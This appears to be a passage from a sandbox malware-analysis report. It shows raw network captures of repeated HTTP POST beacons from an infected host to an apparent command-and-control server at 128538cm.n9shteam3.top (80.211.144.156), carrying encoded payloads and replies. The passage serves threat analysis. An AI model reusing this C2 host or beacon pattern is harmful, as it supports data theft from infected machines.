                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            126192.168.2.64987480.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:39.309196949 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:39.674917936 CEST1028OUTData Raw: 55 51 5a 56 5e 46 59 5d 5b 5f 56 5a 57 54 50 5a 55 51 5e 48 50 58 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQZV^FY][_VZWTPZUQ^HPXZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&"=X((36$%<[784<]0!+3>'>&Y-%^./]+
                                                            Sep 2, 2024 13:35:39.982764006 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:40.114883900 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            127192.168.2.64987580.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:40.262665987 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:40.618944883 CEST1028OUTData Raw: 50 52 5a 51 5e 49 5c 50 5b 5f 56 5a 57 54 50 5b 55 51 5e 45 50 5f 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PRZQ^I\P[_VZWTP[UQ^EP_ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'1X(;('=Z%=*\>-8-7''?9W<^0)$?>&.:%^./]+
                                                            Sep 2, 2024 13:35:40.920399904 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:41.049166918 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            128192.168.2.64987680.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:40.269515991 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1324
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:40.618822098 CEST1324OUTData Raw: 55 5f 5a 50 5e 43 59 53 5b 5f 56 5a 57 5d 50 5d 55 5e 5e 44 50 53 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U_ZP^CYS[_VZW]P]U^^DPSZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'_3!<;$0%Z'-:(=4Z8$3'<%T?80W=$<=^:*%^./]+
                                                            Sep 2, 2024 13:35:40.920420885 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:41.053333044 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 1e 34 1d 27 55 32 02 33 00 3e 39 07 06 2b 3d 3b 1b 2e 2c 3f 04 24 00 3f 10 28 1c 0b 18 25 29 03 59 3e 3c 0f 58 28 1c 39 1e 35 1e 20 5b 03 1f 26 06 23 54 32 13 26 06 31 58 24 37 22 5c 21 19 23 07 29 2e 29 09 27 2d 24 58 20 08 32 12 3b 13 0c 14 25 38 2c 5f 2d 12 29 05 25 2e 2a 56 08 16 38 1d 2b 02 35 06 34 19 06 01 21 28 2d 1f 20 18 33 51 24 1d 09 55 33 39 2d 55 24 3e 24 0c 3d 2e 3c 01 33 07 00 06 20 0d 3d 55 3a 03 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: 4'U23>9+=;.,?$?(%)Y><X(95 [&#T2&1X$7"\!#).)'-$X 2;%8,_-)%.*V8+54!(- 3Q$U39-U$>$=.<3 =U:$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            129192.168.2.64987780.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:41.170368910 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:41.524825096 CEST1028OUTData Raw: 55 50 5f 56 5e 40 5c 54 5b 5f 56 5a 57 5f 50 59 55 51 5e 47 50 52 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UP_V^@\T[_VZW_PYUQ^GPRZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'9X+;;'T!$5+= /4 0<9?<=([*")::%^./]+
                                                            Sep 2, 2024 13:35:41.844887018 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:41.966924906 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            130192.168.2.64987880.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:42.109360933 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:42.464344978 CEST1028OUTData Raw: 50 52 5f 56 5b 44 59 56 5b 5f 56 5a 57 5a 50 5d 55 5a 5e 48 50 5c 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PR_V[DYV[_VZWZP]UZ^HP\ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'!>?'%"=[0."^+<,('Z5R+T=8[)1Y.:%^./]+
                                                            Sep 2, 2024 13:35:42.766242027 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:42.890738010 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            131192.168.2.64987980.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:43.031779051 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:43.384490967 CEST1028OUTData Raw: 55 5e 5f 56 5e 40 5c 57 5b 5f 56 5a 57 5f 50 5a 55 50 5e 47 50 5b 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^_V^@\W[_VZW_PZUP^GP[ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'_3"<?$">32+(/?'%T</)$=.:%^./]+
                                                            Sep 2, 2024 13:35:43.693470955 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:43.821547985 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            132192.168.2.64988080.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:43.981528997 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:44.338293076 CEST1028OUTData Raw: 50 53 5a 51 5e 47 5c 50 5b 5f 56 5a 57 5c 50 5b 55 50 5e 45 50 5f 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZQ^G\P[_VZW\P[UP^EP_ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z'!<^7$X3>"X>=4;'$3%?<P*$8^=2"9:%^./]+,
                                                            Sep 2, 2024 13:35:44.638926029 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:44.769257069 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            133192.168.2.64988180.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:45.944703102 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:46.291327953 CEST1028OUTData Raw: 55 5e 5a 52 5e 42 5c 51 5b 5f 56 5a 57 5f 50 5e 55 5c 5e 44 50 59 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZR^B\Q[_VZW_P^U\^DPYZ^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&1<Y$=X39(>;-$'<U*88T=8>1!.*%^./]+
                                                            Sep 2, 2024 13:35:46.596846104 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:46.723119020 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            134192.168.2.64988280.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:46.080957890 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:46.431241989 CEST1340OUTData Raw: 50 51 5a 5f 5b 43 59 57 5b 5f 56 5a 57 5a 50 53 55 5d 5e 40 50 52 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZ_[CYW[_VZWZPSU]^@PRZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z'!9X+; '1=0-&Y>-8[84$[3,5W<8T('(=-:*%^./]+
                                                            Sep 2, 2024 13:35:46.728918076 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:46.855777025 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0c 23 1d 23 1d 31 05 30 10 2b 29 3a 5b 28 2d 0e 0b 39 01 2f 05 33 17 3b 5e 28 32 25 1b 25 5f 31 11 2b 3c 03 5c 3f 22 2e 0a 22 1e 20 5b 03 1f 26 07 34 31 36 1d 32 06 2e 03 30 37 00 59 22 34 3c 5a 3e 5b 36 56 27 13 1a 5d 37 1f 0c 12 3b 3d 25 0e 31 16 0e 12 39 3c 0b 04 31 3e 2a 56 08 16 38 1e 3c 05 21 07 22 24 24 00 20 2b 21 54 23 25 27 56 27 20 3f 11 27 04 32 0b 24 2e 2b 51 3e 03 2b 58 33 29 00 02 37 1d 0b 54 2d 29 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: ###10+):[(-9/3;^(2%%_1+<\?"." [&4162.07Y"4<Z>[6V']7;=%19<1>*V8<!"$$ +!T#%'V' ?'2$.+Q>+X3)7T-)$P.-V0WS
                                                            Sep 2, 2024 13:35:46.858948946 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:47.061305046 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:47.061549902 CEST1028OUTData Raw: 55 54 5a 55 5e 45 59 5d 5b 5f 56 5a 57 54 50 5a 55 51 5e 42 50 52 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZU^EY][_VZWTPZUQ^BPRZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[$!_?;'Y$1=[%=2Y+=(Z;$,=(,V*>1]9%^./]+
                                                            Sep 2, 2024 13:35:47.365511894 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            135192.168.2.64988380.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:47.498845100 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:47.853002071 CEST1024OUTData Raw: 55 53 5a 51 5e 42 59 54 5b 5f 56 5a 57 5d 50 58 55 58 5e 47 50 5e 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: USZQ^BYT[_VZW]PXUX^GP^Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$\?43>%.&]<.7;'7$9W++0Q='4_)).*%^./]+
                                                            Sep 2, 2024 13:35:48.164413929 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:48.289160013 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            136192.168.2.64988480.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:48.415719986 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:48.774874926 CEST1028OUTData Raw: 55 5e 5f 51 5b 44 5c 57 5b 5f 56 5a 57 54 50 5e 55 5a 5e 40 50 59 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^_Q[D\W[_VZWTP^UZ^@PYZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''^?\'Y3X1?8$+3,-<;;(4+?!":*%^./]+
                                                            Sep 2, 2024 13:35:49.061068058 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:49.185448885 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            137192.168.2.64988580.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:49.335589886 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:49.727447033 CEST1028OUTData Raw: 50 55 5a 5f 5b 44 59 50 5b 5f 56 5a 57 59 50 5a 55 51 5e 46 50 58 5a 5b 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZ_[DYP[_VZWYPZUQ^FPXZ[YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X$2-?8;\$2=_%.:^?8'(Z$Z5('('8*2!9%^./]+8
                                                            Sep 2, 2024 13:35:49.999872923 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:50.133835077 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            138192.168.2.64988680.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:50.260335922 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:50.621217966 CEST1028OUTData Raw: 50 56 5a 55 5e 44 59 52 5b 5f 56 5a 57 5a 50 5e 55 51 5e 49 50 5d 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZU^DYR[_VZWZP^UQ^IP]ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$""+,'!0.9+[,'(\3<?; V=?!:*%^./]+
                                                            Sep 2, 2024 13:35:50.919668913 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:51.146625996 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            139192.168.2.64988780.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:51.279153109 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
